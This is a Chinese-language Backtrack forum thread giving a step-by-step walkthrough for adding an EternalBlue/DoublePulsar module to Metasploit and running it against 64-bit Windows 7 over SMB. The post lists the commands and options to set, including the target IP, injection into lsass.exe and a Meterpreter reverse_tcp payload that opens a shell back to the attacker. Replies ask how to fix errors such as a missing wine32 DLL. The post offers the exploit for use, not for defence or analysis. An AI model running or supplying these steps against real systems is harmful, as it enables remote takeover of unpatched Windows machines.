最新的backtrack5(bt5)官方网站已经提供下载,backtrack5是基于ubuntu Lucid LTS. 内核2.6.38开发的,完全开源并和GPL兼容。

Backtrack 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 4738|回复: 5

[分享] 通过Backtrack Linux的Eternalblue Metasploit访问WINDOWS 7

[复制链接]
锦俊
线妙旋
                           
把Eternalblue添加到metasploit的运行工具,运行Windows 7或Windows Server 2008,然后得到一个shell。
我正在测试32位Windows 7正在运行的漏洞,但它从来拿到一个shell。可能是错误的。

现在该方法适用于Windows 64位和Backtrack linux 64位,支持或架构为32bits的Wine。
sudodpkg --add-architecture i386
apt-get install wine32
您必须禁用防火墙,否则该漏洞将不会执行
必须使用Windows7/64位的系统不需要安装其他的东西
现在我们通过git clone 命令来克隆
现在开始测试。
cdEternalblue-Doublepulsar-Metasploit
cpeternalblue_doublepulsar.rb/usr/share/metasploit-framework/modules/exploits/windows/smb/
我们所做的是将模块添加到metasploit中
servicepostgresql start
use exploit/windows/smb/eternalblue_doublepulsar
show options
set DOUBLEPULSARPATH/root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set PROCESSINJECT lsass.exe
lsass.exe仅适用于windows64位
set RHOST 192.168.1.11
RHOST是目标(被攻击主机)IP。
set TARGETARCHITECTURE x64
set target 9
添加目标到windows 7
set PAYLOAD windows/x64/meterpreter/reverse_tcp
有效载荷必须是64位的
set LHOST 192.168.1.5
LHOST 为自己(本机)的IP
运行exp



现在你只需要试着去做。请记住,在32位中,漏洞利用执行会崩溃。
记得很久以前的Windows XP漏洞ms08_06。



+1
4744°C
5
  • Lzywi
  • Lzywi
  • 雪山飞狐儿
  • kantzzz
  • Backtrackliniuxit
过: 他们
昕彤
升梓
F:\微信图片_20170514203138.png
萌新求问出现上面的情况怎么解决?
公孙香梅
凡振
[-] 192.168.1.106:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/.wine/drive_c/eternal11.dll
出现这种情况怎么办?
钞吉星
斋笑雯
Lzywi 发表于 2017-5-14 20:35
[-] 192.168.1.106:445 - Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root ...

这个问题解决了吗?我也是遇到这种情况了。。。
栀采
仙恬欣
雪山飞狐儿 发表于 2017-8-4 15:11
这个问题解决了吗?我也是遇到这种情况了。。。

没有wine32位的
晨轩
松向露

wine32  怎么安装有没有详细的步骤和方法。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

BackTrack是一套专业的计算机安全检测的Linux操作系统,简称BT。BackTrack 是一个基于Ubuntu GNU/Linux的发行版本,主要用做数字取证和入侵测试。它的名字引用自回溯法(backtracking)。BackTrack 给用户提供了大量功能强大但简单易用的安全工具软件。BackTrack还支持Live CD和Live USB启动方式,用户可以直接从移动介质启动该系统而不用将系统安装在硬盘上。BackTrack被设计成一体化的旨在安全审计用的livecd,曾经它是被最广泛采用的渗透测试框架并被世界各地的安全社区所使用。现在,BackTrack已被Kali Linux所代替,BT将不再维护。
快速回复 返回顶部 返回列表